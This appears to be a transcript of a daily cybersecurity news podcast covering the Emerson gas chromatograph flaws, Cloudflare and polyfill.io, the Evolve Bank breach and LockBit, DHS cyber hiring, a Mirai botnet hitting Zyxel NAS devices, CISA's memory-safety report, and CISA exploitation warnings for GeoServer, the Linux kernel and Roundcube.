In today’s cybersecurity news…
Gas chromatograph vulnerabilities reveal medical IoT challenges
The research firm Claroty has revealed four vulnerabilities within the model Rosemount 370XA gas chromatograph manufactured by Emerson. This is a device used by hospitals for blood testing and by environmental facilities to measure air pollution. These devices are also connected to internal networks and are connected to internal networks and they are “controlled remotely by technicians over a communication channel that leverages a proprietary protocol.” This points to a weakness that could be exploited by threat actors as another method for attacking hospitals and other infrastructure. For context in this case, CISA and Emerson both published advisories regarding these vulnerabilities in January, and a patch was made available.
We never authorized polyfill.io to use our name, says Cloudflare
Following up on the polyfill.io story we covered in yesterday’s newscast, CDN provider Cloudflare has stated that it “had not authorized the use of its name or logo on the Polyfill.io website, and is criticizing Polyfill.io’s unauthorized use of its name and logo as misleading to customers, adding, on their blog, “this is yet another warning sign that Polyfill.io cannot be trusted.” As of this recording, Cloudflare continues to automatically replace polyfill.io links with a safe mirror on websites that use Cloudflare protection (including free plans), and polyfill.io is no longer online.
Evolve Bank confirms data breach, undermining LockBit’s Federal Reserve claim
Arkansas-based Evolve Bank & Trust confirmed this week the theft of customer information which has now been posted on the dark web. Bank representatives say the information involved PII including Social Security Numbers, but not financial or banking information. This appears to be a job pulled off by hackers affiliated with LockBit, which itself had claimed to have breached the U.S. Federal Reserve. The first batch of documents that it leaked, which were supposedly linked to the agency, reportedly actually belonged to Evolve Bank & Trust. Among them was a press release about the Federal Reserve enforcement action against Evolve Bank alongside regarding deficiencies in anti-money laundering controls and risk management practices.
And now a word from our sponsor, Prelude
DHS aims to streamline clearance approvals to increase headcount
As lawmakers at a House hearing pointed at the federal government’s “cumbersome hiring process that has undermined its ability to recruit cyber talent,” CIO Eric Hysen responded “that the DHS uses a “multipronged approach including through its Cybersecurity Talent Management System and by assessing clearance protocols, but that it is “looking to reduce requirements [and] expand the use of interim clearances at both the secret and top secret level.” This solution is just one of many proposed to assist with the estimated 500,000 vacant cyber-related jobs in the country.
Mirai-based botnet exploiting a recently disclosed vulnerability in Zyxel NAS devices
Researchers at the Shadowserver Foundation are warning of a Mirai-based botnet that is exploiting a recently disclosed vulnerability with a CVSS score of 9.8 in end-of-life Zyxel NAS devices. The flaw is a command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 firmware. The researchers are strongly suggesting a replacement of the EoL devices given that PoC exploit code is publicly available. Further details are available in the show notes to this episode.
Most critical open source projects not using memory safe code, says CISA
The agency, working with the FBI and Australian and Canadian authorities, has published research that looked at 172 key open-source projects to determine whether they are susceptible to memory flaws. The goal of the report is to raise awareness about the importance of memory-safe code, which is designed to prevent common memory-related errors such as buffer overflows, use-after-free, and other types of memory corruption. Some of the findings in the report are, that “52% of critical open-source projects analyzed contain code written in memory-unsafe languages, 55% of the total lines of code (LoC) across these projects are written in memory-unsafe languages, and that the largest projects are disproportionately written in memory-unsafe languages.” The report also highlights “the problem of developers disabling memory-safety features, either by error or on purpose, to meet specific requirements, resulting in risks even when using theoretically safer building blocks.
CISA warns of vulnerabilities being exploited in GeoServer, Linux Kernel, and Roundcube
These three warnings were announced on Wednesday, regarding three separate issues that have been observed being exploited in the wild by threat actors. The GeoServer flaw has a CVSS score of 9.8 and is described as a code injection flaw that could be exploited to achieve remote code execution. The Linux kernel flaw is a use-after-free issue in nft tables that could lead to privilege escalation, and the Roundcube flaw is a four-year-old vulnerability in its Webmail versions before 1.4.5 and is described as a cross-site scripting (XSS) issue that can be triggered via malicious XML attachments. Roundcube released patches for the flaw in early June 2020.